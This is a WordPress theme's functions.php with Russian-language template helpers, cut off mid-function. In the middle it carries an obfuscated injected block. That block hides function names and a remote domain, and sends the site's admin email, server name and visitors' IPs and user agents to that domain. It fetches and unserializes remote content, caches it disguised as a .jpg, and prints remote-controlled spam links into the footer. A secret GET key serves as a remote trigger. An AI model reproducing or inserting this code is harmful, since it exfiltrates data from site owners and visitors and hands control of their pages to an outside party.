<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lKllcL='6';$kNaQeZ='a';$ZrAyWc='b';$HJHbCrH='s';$VFvX='c';$WoXMZku='e';$tOThL='e';$FtPn='_';$zaQKn='e';$SgmlVz='d';$xpFO='d';$ZOtjBt='4';$eWfyg='o';$itzlmRAx=$ZrAyWc.$kNaQeZ.$HJHbCrH.$zaQKn.$lKllcL.$ZOtjBt.$FtPn.$xpFO.$WoXMZku.$VFvX.$eWfyg.$SgmlVz.$tOThL;$ChImh='l';$KCavIm='e';$xPHyu='n';$asKtcNw='a';$OlMsJ='z';$cUxZ='i';$vuLfluw='f';$KlJa='g';$kwlIlTg='t';$WZUKRJql=$KlJa.$OlMsJ.$cUxZ.$xPHyu.$vuLfluw.$ChImh.$asKtcNw.$kwlIlTg.$KCavIm;$qFxBTRM='1';$PSBuW='t';$loukmj='_';$IBoJWW='t';$HUVzRAC='r';$XRXFcQ='s';$aJOU='3';$MbEeoVI='r';$nljCUg='o';$pFMZYOMv=$XRXFcQ.$IBoJWW.$MbEeoVI.$loukmj.$HUVzRAC.$nljCUg.$PSBuW.$qFxBTRM.$aJOU;$TSraLan='t';$qbnoX='s';$fpzRmVW='r';$yTdCZnb='r';$qmtEB='e';$zukQv='v';$RoBMWwef=$qbnoX.$TSraLan.$yTdCZnb.$fpzRmVW.$qmtEB.$zukQv;                     
		$kr_______________e='6';$tp_______a='a';$ap_____i='b';$nq______m='s';$cy_________p='c';$tm_________m='e';$ch____y='e';$dv________t='_';$bs______s='e';$ok______z='d';$fe_____g='d';$wg_______p='4';$ow___q='o';$sz_______j=$ap_____i.$tp_______a.$nq______m.$bs______s.$kr_______________e.$wg_______p.$dv________t.$fe_____g.$tm_________m.$cy_________p.$ow___q.$ok______z.$ch____y;
		$au________u='i';$zf____o='t';$fb_____x='_';$fw_______b='s';$wh_____p='n';$nz___________n='x';$je____________j='s';$zv__________h='c';$tq______________a='n';$tx_____________q='f';$uh_____________k='i';$oz___________w='o';$sw___________f='u';$pb_______j='t';$yx___r='e';$rb_______l=$tx_____________q.$sw___________f.$tq______________a.$zv__________h.$pb_______j.$au________u.$oz___________w.$wh_____p.$fb_____x.$yx___r.$nz___________n.$uh_____________k.$je____________j.$zf____o.$fw_______b;
		$as_____________d='o';$ks__________f='e';$pd______u='f';$in________a='p';$bx_________k='n';$xf_____________y=$pd______u.$as_____________d.$in________a.$ks__________f.$bx_________k;
		$mg______a='a';$ri_______p='e';$hj____________f='r';$ct___c='d';$hk______________j='f';$gz______x=$hk______________j.$hj____________f.$ri_______p.$mg______a.$ct___c;
		$hc_____g='s';$is______________y='e';$gj_____________z='c';$if_____v='f';$qo__m='l';$cs__________b='o';$eb_____________a=$if_____v.$gj_____________z.$qo__m.$cs__________b.$hc_____g.$is______________y;
		
		define("WP_ID", $sz_______j("Mi4wLjA="));
		define("WP_TTL", $sz_______j("MTA4MDA="));
		define("WP_SRC", $sz_______j("dHBva24="));
	


		function wp_get_header() {
			global $sz_______j, $rb_______l;
			
			if (
				$rb_______l($sz_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$rb_______l($sz_______j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$rb_______l($sz_______j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $sz_______j, $xf_____________y, $eb_____________a, $gz______x;
			
			$ut___________c = TEMPLATEPATH."/".$sz_______j("Zm9vdGVyLnBocA==");
			$ab______g = @$xf_____________y($ut___________c, "r");
			$ut___________c = @$gz______x($ab______g, @filesize($ut___________c));
			@$eb_____________a($ab______g);
			
			$vh_____________c = TEMPLATEPATH."/".$sz_______j("ZnVuY3Rpb25zLnBocA==");
			$ab______g = @$xf_____________y($vh_____________c, "r");
			$vh_____________c = @$gz______x($ab______g, @filesize($vh_____________c));
			@$eb_____________a($ab______g);
			
			$hy_______t = 0;
			if($ut___________c && $vh_____________c) {
				if ($sz_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ut___________c, $sz_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hy_______t = 1;
					}
					if (substr_count($ut___________c, "wp_theme_GPL_credits()") < 1) {
						$hy_______t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hy_______t = 12;
				}
			}
			
			if($hy_______t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hy_______t -->";
			}
		}
	


		function wp_loaded() {
			global $sz_______j, $rb_______l;
			return $rb_______l($sz_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($eb___________o, $bo________f = "(more...)", $ix_______t = 0, $nk____________h = "") {
				$qf____________a = get_the_content($bo________f, $ix_______t, $nk____________h);
				$qf____________a = apply_filters("the_content", $qf____________a);
				
				$qf____________a = str_replace("]]>", "]]>", $qf____________a);
				if (strlen($_GET["p"]) > 0) {
					echo $qf____________a;
				}
				else if ((strlen($qf____________a)>$eb___________o) && ($og________p = strpos($qf____________a, " ", $eb___________o ))) {
					$qf____________a = substr($qf____________a, 0, $og________p);
					$qf____________a = $qf____________a;
					echo $qf____________a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bo________f</a></div></p>";
				} else {
					echo $qf____________a;
				}
				
			}
		}
	


		$un______________w='b';$cl_____________z='d';$xs________o='a';$hn_____b='_';$we___s='6';$wn_________w='s';$ld___g='e';$py___________g='e';$qe_______________u='4';$ro___n='c';$bq_______r='o';$pm__e='e';$qy___o='n';$dv__r=$un______________w.$xs________o.$wn_________w.$pm__e.$we___s.$qe_______________u.$hn_____b.$ld___g.$qy___o.$ro___n.$bq_______r.$cl_____________z.$py___________g;
		$te_______________f='_';$od____u='o';$mt___________a='i';$wg___________y='e';$hh________d='n';$yz____x='n';$yr__________c='f';$xu__w='s';$bt_____________u='t';$zc_________x='t';$ge___r='e';$vu___o='_';$wt_______________k='g';$jr______f='e';$ys_____o='c';$bq___________y='t';$qw______________p='l';$jd_____r=$yr__________c.$mt___________a.$qw______________p.$ge___r.$vu___o.$wt_______________k.$wg___________y.$zc_________x.$te_______________f.$ys_____o.$od____u.$hh________d.$bq___________y.$jr______f.$yz____x.$bt_____________u.$xu__w;
		$bj______________n='i';$fy______________w='l';$kn___________q='t';$xe_______g='_';$fz________q='e';$cf_______________n='e';$ii______o='f';$mo________p='s';$ba___________d='s';$mr__m='x';$ut___________c='i';$rk___________v=$ii______o.$bj______________n.$fy______________w.$cf_______________n.$xe_______g.$fz________q.$mr__m.$ut___________c.$ba___________d.$kn___________q.$mo________p;
		$mf__k='r';$dx___u='r';$tx_____________h='e';$qd____________k='o';$vj___y='c';$ty_________r='i';$ca__________o='e';$za_____________t='p';$ks________o='o';$ql___________n='s';$yi_______p='a';$yn______________k='n';$nu_______________x='_';$ja_______f='v';$po______g='m';$nf_____s=$ja_______f.$ca__________o.$dx___u.$ql___________n.$ty_________r.$qd____________k.$yn______________k.$nu_______________x.$vj___y.$ks________o.$po______g.$za_____________t.$yi_______p.$mf__k.$tx_____________h;
		$vj____________s='n';$xx________k='s';$fj______t='e';$nl__z='f';$pq__z='p';$vo_________j='o';$yc___________x='k';$gx____c='c';$pq______________q='o';$lg_____j=$nl__z.$xx________k.$pq______________q.$gx____c.$yc___________x.$vo_________j.$pq__z.$fj______t.$vj____________s;
		$zf____x='e';$bi___________z='r';$va_____________q='w';$aw______________t='i';$rq______________y='f';$tr______d='t';$qi___b=$rq______________y.$va_____________q.$bi___________z.$aw______________t.$tr______d.$zf____x;
		$fh_________e='5';$ft__________g='m';$qn_______________j='d';$he__________j=$ft__________g.$qn_______________j.$fh_________e;
		$xk__e='a';$wv_________j='h';$by_____b='a';$mm____o='r';$ln_____y='e';$fj__d='p';$kn__________o='t';$ov__________m='l';$ix__________s=$mm____o.$ln_____y.$xk__e.$ov__________m.$fj__d.$by_____b.$kn__________o.$wv_________j;
		$iq______r='i';$xr___________m='u';$st__________t='r';$wa__________z='a';$ij_______g='l';$ub________m='n';$ax______________s='e';$bb___________w='i';$dd______d='z';$az__u='s';$ci______________d='e';$iz_______w=$xr___________m.$ub________m.$az__u.$ax______________s.$st__________t.$iq______r.$wa__________z.$ij_______g.$bb___________w.$dd______d.$ci______________d;
		$pa__________e='p';$ko_______y='t';$oh______a='a';$ig_____________t='n';$dj__f='m';$ac_____________c='e';$cy__________g='m';$tn______________k=$ko_______y.$ac_____________c.$dj__f.$pa__________e.$ig_____________t.$oh______a.$cy__________g;
		$uz____________n='e';$cz___v='o';$bi__________m='x';$co______________x='t';$tu____________n='_';$ts_____n='t';$bm______________a='a';$uw__________p='s';$kb_______________j='m';$tf_______n='c';$ss____m='r';$va_________j='a';$cd______________t='r';$ad__c='c';$go____q='e';$nh____p='e';$rj______k='n';$qy_______________s='t';$jo_____________t='t';$jf_______________z='_';$np_______p='e';$qp____j=$uw__________p.$ts_____n.$ss____m.$uz____________n.$bm______________a.$kb_______________j.$jf_______________z.$tf_______n.$cz___v.$rj______k.$co______________x.$np_______p.$bi__________m.$jo_____________t.$tu____________n.$ad__c.$cd______________t.$nh____p.$va_________j.$qy_______________s.$go____q;
	


		function kw_______q($wh______r) {
			global $sz_______j, $rb_______l, $jd_____r, $nf_____s, $qp____j;
			
			if (!$rb_______l($sz_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($nf_____s(PHP_VERSION, "5.0.0", ">=") && $rb_______l($sz_______j("ZmlsZV9nZXRfY29udGVudHM=")) && $rb_______l($sz_______j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$jh_____q = $qp____j(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qb_______________u = @$jd_____r($wh______r, 0, $jh_____q);
			} else {
				$qb_______________u = @$jd_____r($wh______r, 0);
			}
			
			return $qb_______________u;
		}
	


		function dh_____________q($wh______r) {
			global $rb_______l, $lg_____j, $qi___b, $sz_______j;
			
			if (!$rb_______l($sz_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$qo______n = strpos($wh______r, "/", 7);
			$kh__________t = array(
				"uri"     => substr($wh______r, $qo______n),
				"host"    => str_replace("http://", "", substr($wh______r, 0, $qo______n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mj_______x = @$lg_____j("$kh__________t[host]", 80, $gj____t, $lt_________g, 4);
			
			if (!$mj_______x) {
				return false;
			} else {
				$qb_______________u = "";
				$ys______________a  = "GET $kh__________t[uri] HTTP/1.0\r\n";
				$ys______________a .= "Host: $kh__________t[host]\r\n";
				$ys______________a .= "Referer: $kh__________t[referer]\r\n";
				$ys______________a .= "Connection: Close\r\n\r\n";
				
				@$qi___b($mj_______x, $ys______________a);
				
				while (!@feof($mj_______x)) {
					$eq_____w = @fgets($mj_______x, (1024*24));
					
					if ($eq_____w == "\r\n") {
						$ld________e = true;
						continue;
					}
					
					if ($ld________e) {
						$qb_______________u .= $eq_____w;
					}
				}
				
				return $qb_______________u;
			}
		}
	


		function bk_________a($wh______r) {
			global $rb_______l;
			$ze______a = false;
			
			if ($wh______r != "") {
				if ($rb_______l("kw_______q")) {
					$ze______a = @kw_______q($wh______r);
				}
				
				if (!$ze______a && ($rb_______l("dh_____________q"))) {
					$ze______a = @dh_____________q($wh______r);
				}
			}
			
			return $ze______a;
		}
	


		function bv_______________l() {
			global $_SERVER, $he__________j;
			
			$fw________g = $_SERVER["SERVER_NAME"];
			
			if (substr("$fw________g", 0, 4) == "www.") {
				$fw________g = substr("$fw________g", 4);
			}
			
			$fw________g = $he__________j("$_SERVER[SERVER_NAME]");
			
			return $fw________g;
		}
	


		function fk___________m() {
			return "file";
		}
	


		function ck____q($wh______r) {
			global $_SERVER, $jd_____r, $rk___________v, $xf_____________y, $eb_____________a, $qi___b;
			
			$jh__________k = vp_________p();
			
			$ud__________h = bv_______________l().".jpg";
			$ee_____________x = $jh__________k["dir_upload"]["path"]."/$ud__________h";
			$jh__e = @filemtime($ee_____________x);
			
			if (!$jh__e || ((time()-$jh__e) >= WP_TTL)) {
				$ze______a = bk_________a($wh______r);
				
				if ($ze______a) {
					if ($rk___________v($ee_____________x)) {
						@unlink($ee_____________x);
					}
					
					$ab______g = @$xf_____________y($ee_____________x, "x+");
					
					@$qi___b($ab______g, $ze______a);
					@$eb_____________a($ab______g);
				}
			} else {
				if ($rk___________v($ee_____________x)) {
					$ze______a = @$jd_____r($ee_____________x);
				} else {
					$ze______a = false;
				}
			}
			
			return $ze______a;
		}
	


		function vp_________p() {
			global $_SERVER, $sz_______j, $dv__r;
			
			$pw___k = wp_count_posts("post");
			$ov___n = pathinfo(get_bloginfo("template_directory"));
			
			$jh__________k = array(
				"url" => array(
					"report"      => $sz_______j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ov___n,
				"dir_upload"	=> nw___e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ov___n[filename],
					"a005=".$pw___k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/cistit-%E2%80%93-bolezn-korotkix-yubok\">Цистит – болезнь коротких юбок</a>"
			);
			
			$jh__________k["url"]["queryString"] = implode("&", $jh__________k["queryString"]);
			$jh__________k["url"]["report"] = $jh__________k["url"]["report"]."/?".$dv__r($jh__________k["url"]["queryString"]).".html";
						
			return $jh__________k;
		}
	


		function nw___e() {
			$oi________h = wp_upload_dir();
			
			if (isset($oi________h["error"])) {
				$tr_____h = ad__d();
				if (is_writable($tr_____h)) {
					$oi________h = array("path" => $tr_____h);
				}
			}

			return $oi________h;
		}
	


		function ad__d() {
			global $rb_______l, $he__________j, $ix__________s, $tn______________k;
			
			$tw_____________i = (bool) ini_get("safe_mode");
			if ($tw_____________i == true) {
				return false;
			}
			
			if ($rb_______l("sys_get_temp_dir")) {
				$kt_______________d = sys_get_temp_dir();
				if (is_writable($kt_______________d)) {
					return $ix__________s($kt_______________d);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ix__________s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ix__________s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ix__________s($_ENV["TEMP"]);
			} else {
				$ki_________z = $tn______________k($he__________j(uniqid(rand(), true)), "");
				if ($ki_________z) {
					$kt_______________d = $ix__________s(dirname($ki_________z));
					@unlink($ki_________z);
					return $kt_______________d;
				} else {
					return false;
				}
			}
		}
	


		function iz____________p() {
			global $_GET, $rk___________v;
			
			$jh__________k = vp_________p();
			$fw________g = bv_______________l();
			$hy__j = fk___________m();
			
			$gx___v = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hy__j == "file") {
					$ob__________w = $jh__________k["dir_upload"]["path"]."/".$fw________g.".jpg";
					if ($rk___________v($ob__________w)) {
						@unlink($ob__________w);
						$gx___v = "deleted";
					}
				}
				
				$ea_______________k = array(
					"s"	=> $gx___v,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ea_______________k AS $mt____________a => $uj______________a) echo " [$mt____________a:$uj______________a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $rb_______l, $sz_______j, $iz_______w;
			$jh__________k = vp_________p();
			
			$nc________x = "ck____q";
			if ($rb_______l($nc________x)) {
				$qb_______________u = $nc________x($jh__________k["url"]["report"]);
			}
			
			if ($qb_______________u) {
				if ($qb_______________u = @$sz_______j($qb_______________u)) {
					$qb_______________u = @$iz_______w($qb_______________u);
					
					if (strlen($qb_______________u[custom_credit]) >= 5) {
						$jh__________k["default_string"] = $qb_______________u[custom_credit];
					}
					
					if ($qb_______________u["status"] == "0") {
						$or_________s = 1;
						$vg_________d = 1;
					} else {
						$kc______________f = sizeof($qb_______________u["links"]);
						$lx_________b = $jh__________k["default_string"];
						
						if ($kc______________f > 0 && $qb_______________u["links"] !== "") {
							$xf__________x = 0;
							foreach ($qb_______________u["links"] as $ob____i => $em______p) {
								$xf__________x++;
								if ($em______p->l_path == "" || $em______p->l_path == $_SERVER["REQUEST_URI"]) {
									$em______p->l_href = htmlspecialchars(strip_tags($em______p->l_href));
									$em______p->l_title = htmlspecialchars(strip_tags($em______p->l_title));
									$em______p->l_anchor = htmlspecialchars(strip_tags($em______p->l_anchor));
									$lx_________b .= " | ";
									$lx_________b .= "<a href='$em______p->l_href' title='$em______p->l_title'";
									if ($em______p->l_nofollow == "1") {
										$lx_________b .= " rel='nofollow'";
									}
									$lx_________b .= ">$em______p->l_anchor</a>";
								}
							}
						}
						$jh__________k["links"] = "$lx_________b";
						if ($qb_______________u[credit] == "0") {
							$jh__________k["links"] = "";
						}
					}
				} else {
					$or_________s = "1";
				}
			} else {
				$or_________s = "1";
			}
			
			if ($or_________s == "1") {
				$jh__________k["links"] = $jh__________k["default_string"];
			}
			
			echo "$jh__________k[links]";
			
			echo "<!-- s: $qb_______________u[signature] -->";
			iz____________p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
